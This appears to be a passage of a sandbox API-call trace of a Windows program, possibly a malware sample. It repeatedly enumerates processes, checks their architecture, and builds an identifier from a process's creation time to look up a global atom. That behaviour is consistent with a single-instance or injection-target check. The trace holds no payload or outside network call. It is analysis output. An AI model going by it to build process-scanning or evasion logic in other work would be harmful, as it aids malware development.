	[0080.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x28c
	[0080.530] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.530] CloseHandle (hObject=0x28c) returned 1
	[0080.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x28c
	[0080.530] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.530] CloseHandle (hObject=0x28c) returned 1
	[0080.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x28c
	[0080.530] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.530] CloseHandle (hObject=0x28c) returned 1
	[0080.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x28c
	[0080.530] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.530] CloseHandle (hObject=0x28c) returned 1
	[0080.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x28c
	[0080.530] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.530] CloseHandle (hObject=0x28c) returned 1
	[0080.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x28c
	[0080.531] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.531] CloseHandle (hObject=0x28c) returned 1
	[0080.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x28c
	[0080.531] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.531] CloseHandle (hObject=0x28c) returned 1
	[0080.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x28c
	[0080.531] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.531] CloseHandle (hObject=0x28c) returned 1
	[0080.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x28c
	[0080.531] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.531] CloseHandle (hObject=0x28c) returned 1
	[0080.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x28c
	[0080.531] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.532] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.532] GetProcessTimes (in: hProcess=0x28c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.532] wsprintfA (in: param_1=0x7724b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.532] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.532] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.532] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.532] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.532] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.532] CloseHandle (hObject=0x28c) returned 1
	[0080.532] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.533] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x28c
	[0080.533] IsWow64Process (in: hProcess=0x28c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.533] CloseHandle (hObject=0x28c) returned 1
	[0080.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.667] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2ac
	[0080.669] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.669] CloseHandle (hObject=0x2ac) returned 1
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2ac
	[0080.669] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.669] CloseHandle (hObject=0x2ac) returned 1
	[0080.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2ac
	[0080.670] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.670] CloseHandle (hObject=0x2ac) returned 1
	[0080.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2ac
	[0080.670] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.670] CloseHandle (hObject=0x2ac) returned 1
	[0080.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2ac
	[0080.670] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.670] CloseHandle (hObject=0x2ac) returned 1
	[0080.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2ac
	[0080.670] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.670] CloseHandle (hObject=0x2ac) returned 1
	[0080.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2ac
	[0080.670] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.670] CloseHandle (hObject=0x2ac) returned 1
	[0080.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2ac
	[0080.670] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.670] CloseHandle (hObject=0x2ac) returned 1
	[0080.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2ac
	[0080.671] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.671] CloseHandle (hObject=0x2ac) returned 1
	[0080.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2ac
	[0080.671] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.671] CloseHandle (hObject=0x2ac) returned 1
	[0080.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2ac
	[0080.671] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.671] CloseHandle (hObject=0x2ac) returned 1
	[0080.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2ac
	[0080.671] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.671] CloseHandle (hObject=0x2ac) returned 1
	[0080.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2ac
	[0080.671] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.671] CloseHandle (hObject=0x2ac) returned 1
	[0080.671] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2ac
	[0080.672] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.672] CloseHandle (hObject=0x2ac) returned 1
	[0080.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2ac
	[0080.672] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.672] CloseHandle (hObject=0x2ac) returned 1
	[0080.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2ac
	[0080.672] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.672] CloseHandle (hObject=0x2ac) returned 1
	[0080.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2ac
	[0080.672] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.672] CloseHandle (hObject=0x2ac) returned 1
	[0080.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2ac
	[0080.672] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.672] CloseHandle (hObject=0x2ac) returned 1
	[0080.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2ac
	[0080.672] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.672] CloseHandle (hObject=0x2ac) returned 1
	[0080.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2ac
	[0080.673] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.673] CloseHandle (hObject=0x2ac) returned 1
	[0080.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2ac
	[0080.673] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.673] CloseHandle (hObject=0x2ac) returned 1
	[0080.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2ac
	[0080.673] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.673] CloseHandle (hObject=0x2ac) returned 1
	[0080.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2ac
	[0080.673] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.673] CloseHandle (hObject=0x2ac) returned 1
	[0080.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2ac
	[0080.673] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.673] CloseHandle (hObject=0x2ac) returned 1
	[0080.673] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2ac
	[0080.673] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.673] CloseHandle (hObject=0x2ac) returned 1
	[0080.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2ac
	[0080.674] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.674] CloseHandle (hObject=0x2ac) returned 1
	[0080.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2ac
	[0080.674] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.674] CloseHandle (hObject=0x2ac) returned 1
	[0080.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2ac
	[0080.674] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.674] CloseHandle (hObject=0x2ac) returned 1
	[0080.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2ac
	[0080.674] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.674] CloseHandle (hObject=0x2ac) returned 1
	[0080.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2ac
	[0080.674] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.674] CloseHandle (hObject=0x2ac) returned 1
	[0080.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2ac
	[0080.674] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.674] CloseHandle (hObject=0x2ac) returned 1
	[0080.675] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x2ac
	[0080.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.675] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.675] GetProcessTimes (in: hProcess=0x2ac, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.675] wsprintfA (in: param_1=0x7bc980, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.675] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.675] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.676] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.676] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.676] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.676] CloseHandle (hObject=0x2ac) returned 1
	[0080.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x2ac
	[0080.676] IsWow64Process (in: hProcess=0x2ac, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.676] CloseHandle (hObject=0x2ac) returned 1
	[0080.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x2c8
	[0080.760] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.760] CloseHandle (hObject=0x2c8) returned 1
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x2c8
	[0080.760] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.760] CloseHandle (hObject=0x2c8) returned 1
	[0080.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2c8
	[0080.761] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.761] CloseHandle (hObject=0x2c8) returned 1
	[0080.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x2c8
	[0080.761] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.761] CloseHandle (hObject=0x2c8) returned 1
	[0080.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x2c8
	[0080.761] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.761] CloseHandle (hObject=0x2c8) returned 1
	[0080.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x2c8
	[0080.761] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.761] CloseHandle (hObject=0x2c8) returned 1
	[0080.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x2c8
	[0080.761] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.761] CloseHandle (hObject=0x2c8) returned 1
	[0080.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x2c8
	[0080.761] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.761] CloseHandle (hObject=0x2c8) returned 1
	[0080.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x2c8
	[0080.762] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.762] CloseHandle (hObject=0x2c8) returned 1
	[0080.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x2c8
	[0080.762] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.762] CloseHandle (hObject=0x2c8) returned 1
	[0080.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x2c8
	[0080.762] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.762] CloseHandle (hObject=0x2c8) returned 1
	[0080.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x2c8
	[0080.762] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.762] CloseHandle (hObject=0x2c8) returned 1
	[0080.762] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x2c8
	[0080.762] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.762] CloseHandle (hObject=0x2c8) returned 1
	[0080.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x2c8
	[0080.763] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.763] CloseHandle (hObject=0x2c8) returned 1
	[0080.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x2c8
	[0080.763] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.763] CloseHandle (hObject=0x2c8) returned 1
	[0080.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x2c8
	[0080.763] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.763] CloseHandle (hObject=0x2c8) returned 1
	[0080.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x2c8
	[0080.763] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.763] CloseHandle (hObject=0x2c8) returned 1
	[0080.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x2c8
	[0080.763] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.763] CloseHandle (hObject=0x2c8) returned 1
	[0080.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x2c8
	[0080.763] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.763] CloseHandle (hObject=0x2c8) returned 1
	[0080.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x2c8
	[0080.764] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.764] CloseHandle (hObject=0x2c8) returned 1
	[0080.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x2c8
	[0080.764] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.764] CloseHandle (hObject=0x2c8) returned 1
	[0080.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x2c8
	[0080.764] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.764] CloseHandle (hObject=0x2c8) returned 1
	[0080.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x2c8
	[0080.764] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.764] CloseHandle (hObject=0x2c8) returned 1
	[0080.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x2c8
	[0080.764] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.764] CloseHandle (hObject=0x2c8) returned 1
	[0080.764] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x2c8
	[0080.764] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.764] CloseHandle (hObject=0x2c8) returned 1
	[0080.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x2c8
	[0080.765] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.765] CloseHandle (hObject=0x2c8) returned 1
	[0080.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x2c8
	[0080.765] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.765] CloseHandle (hObject=0x2c8) returned 1
	[0080.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x2c8
	[0080.765] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.765] CloseHandle (hObject=0x2c8) returned 1
	[0080.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x2c8
	[0080.765] IsWow64Process (in: hProcess=0x2c8, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.765] CloseHandle (hObject=0x2c8) returned 1
	[0080.765] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x2c8
